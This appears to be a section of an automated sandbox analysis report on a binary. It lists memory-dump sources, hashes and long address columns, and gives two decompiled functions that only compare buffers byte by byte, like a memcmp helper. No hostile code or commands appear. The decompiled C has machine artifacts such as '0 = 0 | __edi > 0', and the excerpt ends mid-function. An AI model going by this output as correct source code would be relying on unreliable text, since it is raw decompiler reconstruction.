                                                                                                                0x00ec6093
                                                                                                                0x00ec6096
                                                                                                                0x00ec609a
                                                                                                                0x00ec609c
                                                                                                                0x00ec609f
                                                                                                                0x00ec60a5
                                                                                                                0x00ec60ad
                                                                                                                0x00ec60b6
                                                                                                                0x00ec60ba
                                                                                                                0x00ec60c3
                                                                                                                0x00ec60c7
                                                                                                                0x00ec60c9
                                                                                                                0x00ec60d0
                                                                                                                0x00ec60d4
                                                                                                                0x00ec60dd
                                                                                                                0x00ec60e1
                                                                                                                0x00ec60e4
                                                                                                                0x00ec60e7
                                                                                                                0x00ec60ea
                                                                                                                0x00ec60ec
                                                                                                                0x00ec60f6

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b65ee35fe800dc12d5a7d03fe8afe417b697da2552655689a5fc0face352de9c
                                                                                                                • Instruction ID: b5692194cd1cfaf9593e5bac5bc40a89416fffeccdcaabdfe31cef3184dc5c6d
                                                                                                                • Opcode Fuzzy Hash: b65ee35fe800dc12d5a7d03fe8afe417b697da2552655689a5fc0face352de9c
                                                                                                                • Instruction Fuzzy Hash: CB5239B26087018FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA19CB86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED5F1D, Relevance: .3, Instructions: 345COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ED5F1D(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























                                                                                                                0x00ed5f1d
                                                                                                                0x00ed5f1d
                                                                                                                0x00ed5f23
                                                                                                                0x00ed5faa
                                                                                                                0x00ed5fac
                                                                                                                0x00ed5fae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5fb4
                                                                                                                0x00ed5fba
                                                                                                                0x00ed6041
                                                                                                                0x00ed6043
                                                                                                                0x00ed6045
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed604b
                                                                                                                0x00ed6051
                                                                                                                0x00ed60d8
                                                                                                                0x00ed60da
                                                                                                                0x00ed60dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed60e2
                                                                                                                0x00ed60e8
                                                                                                                0x00ed616f
                                                                                                                0x00ed6171
                                                                                                                0x00ed6173
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6179
                                                                                                                0x00ed617f
                                                                                                                0x00ed6206
                                                                                                                0x00ed6208
                                                                                                                0x00ed620a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6216
                                                                                                                0x00ed629e
                                                                                                                0x00ed62a0
                                                                                                                0x00ed62a2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed62a8
                                                                                                                0x00ed62ae
                                                                                                                0x00ed6335
                                                                                                                0x00ed6337
                                                                                                                0x00ed6339
                                                                                                                0x00ed6339
                                                                                                                0x00000000
                                                                                                                0x00ed6339
                                                                                                                0x00ed62bb
                                                                                                                0x00ed62bd
                                                                                                                0x00ed62d5
                                                                                                                0x00ed62dd
                                                                                                                0x00ed62df
                                                                                                                0x00ed62f7
                                                                                                                0x00ed62ff
                                                                                                                0x00ed6301
                                                                                                                0x00ed6319
                                                                                                                0x00ed6321
                                                                                                                0x00ed6323
                                                                                                                0x00ed632c
                                                                                                                0x00ed632c
                                                                                                                0x00000000
                                                                                                                0x00ed6323
                                                                                                                0x00ed630a
                                                                                                                0x00ed6313
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6313
                                                                                                                0x00ed62e8
                                                                                                                0x00ed62f1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed62f1
                                                                                                                0x00ed62c6
                                                                                                                0x00ed62cf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed62cf
                                                                                                                0x00ed6224
                                                                                                                0x00ed6226
                                                                                                                0x00ed623e
                                                                                                                0x00ed6246
                                                                                                                0x00ed6248
                                                                                                                0x00ed6260
                                                                                                                0x00ed6268
                                                                                                                0x00ed626a
                                                                                                                0x00ed6282
                                                                                                                0x00ed628a
                                                                                                                0x00ed628c
                                                                                                                0x00ed6295
                                                                                                                0x00ed6295
                                                                                                                0x00000000
                                                                                                                0x00ed628c
                                                                                                                0x00ed6273
                                                                                                                0x00ed627c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed627c
                                                                                                                0x00ed6251
                                                                                                                0x00ed625a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed625a
                                                                                                                0x00ed622f
                                                                                                                0x00ed6238
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6238
                                                                                                                0x00ed618c
                                                                                                                0x00ed618e
                                                                                                                0x00ed61a6
                                                                                                                0x00ed61ae
                                                                                                                0x00ed61b0
                                                                                                                0x00ed61c8
                                                                                                                0x00ed61d0
                                                                                                                0x00ed61d2
                                                                                                                0x00ed61ea
                                                                                                                0x00ed61f2
                                                                                                                0x00ed61f4
                                                                                                                0x00ed61fd
                                                                                                                0x00ed61fd
                                                                                                                0x00000000
                                                                                                                0x00ed61f4
                                                                                                                0x00ed61db
                                                                                                                0x00ed61e4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed61e4
                                                                                                                0x00ed61b9
                                                                                                                0x00ed61c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed61c2
                                                                                                                0x00ed6197
                                                                                                                0x00ed61a0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed61a0
                                                                                                                0x00ed60f5
                                                                                                                0x00ed60f7
                                                                                                                0x00ed610f
                                                                                                                0x00ed6117
                                                                                                                0x00ed6119
                                                                                                                0x00ed6131
                                                                                                                0x00ed6139
                                                                                                                0x00ed613b
                                                                                                                0x00ed6153
                                                                                                                0x00ed615b
                                                                                                                0x00ed615d
                                                                                                                0x00ed6166
                                                                                                                0x00ed6166
                                                                                                                0x00000000
                                                                                                                0x00ed615d
                                                                                                                0x00ed6144
                                                                                                                0x00ed614d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed614d
                                                                                                                0x00ed6122
                                                                                                                0x00ed612b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed612b
                                                                                                                0x00ed6100
                                                                                                                0x00ed6109
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6109
                                                                                                                0x00ed605e
                                                                                                                0x00ed6060
                                                                                                                0x00ed6078
                                                                                                                0x00ed6080
                                                                                                                0x00ed6082
                                                                                                                0x00ed609a
                                                                                                                0x00ed60a2
                                                                                                                0x00ed60a4
                                                                                                                0x00ed60bc
                                                                                                                0x00ed60c4
                                                                                                                0x00ed60c6
                                                                                                                0x00ed60cf
                                                                                                                0x00ed60cf
                                                                                                                0x00000000
                                                                                                                0x00ed60c6
                                                                                                                0x00ed60ad
                                                                                                                0x00ed60b6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed60b6
                                                                                                                0x00ed608b
                                                                                                                0x00ed6094
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6094
                                                                                                                0x00ed6069
                                                                                                                0x00ed6072
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed6072
                                                                                                                0x00ed5fc7
                                                                                                                0x00ed5fc9
                                                                                                                0x00ed5fe1
                                                                                                                0x00ed5fe9
                                                                                                                0x00ed5feb
                                                                                                                0x00ed6003
                                                                                                                0x00ed600b
                                                                                                                0x00ed600d
                                                                                                                0x00ed6025
                                                                                                                0x00ed602d
                                                                                                                0x00ed602f
                                                                                                                0x00ed6038
                                                                                                                0x00ed6038
                                                                                                                0x00000000
                                                                                                                0x00ed602f
                                                                                                                0x00ed6016
                                                                                                                0x00ed601f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed601f
                                                                                                                0x00ed5ff4
                                                                                                                0x00ed5ffd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5ffd
                                                                                                                0x00ed5fd2
                                                                                                                0x00ed5fdb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5f29
                                                                                                                0x00ed5f29
                                                                                                                0x00ed5f30
                                                                                                                0x00ed5f32
                                                                                                                0x00ed5f4a
                                                                                                                0x00ed5f4a
                                                                                                                0x00ed5f52
                                                                                                                0x00ed5f54
                                                                                                                0x00ed5f6c
                                                                                                                0x00ed5f6c
                                                                                                                0x00ed5f74
                                                                                                                0x00ed5f76
                                                                                                                0x00ed5f8e
                                                                                                                0x00ed5f8e
                                                                                                                0x00ed5f96
                                                                                                                0x00ed5f98
                                                                                                                0x00ed5fa1
                                                                                                                0x00ed5fa1
                                                                                                                0x00000000
                                                                                                                0x00ed5f98
                                                                                                                0x00ed5f7c
                                                                                                                0x00ed5f7f
                                                                                                                0x00ed5f88
                                                                                                                0x00ed5ae0
                                                                                                                0x00ed5ae0
                                                                                                                0x00ed68d1
                                                                                                                0x00ed68d1
                                                                                                                0x00000000
                                                                                                                0x00ed5f88
                                                                                                                0x00ed5f5a
                                                                                                                0x00ed5f5d
                                                                                                                0x00ed5f66
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5f66
                                                                                                                0x00ed5f38
                                                                                                                0x00ed5f3b
                                                                                                                0x00ed5f44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed5f44

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                • Instruction ID: 758fa95b1beb3b81edc7f9fbd12abe45a7976ee7f77038d23bef870725a246ed
                                                                                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                • Instruction Fuzzy Hash: 50C184332055B309DF2D463A847403FBAA1EA927B631A275FD4B3DF2D5EE20D526D610
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED6352, Relevance: .3, Instructions: 341COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ED6352(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
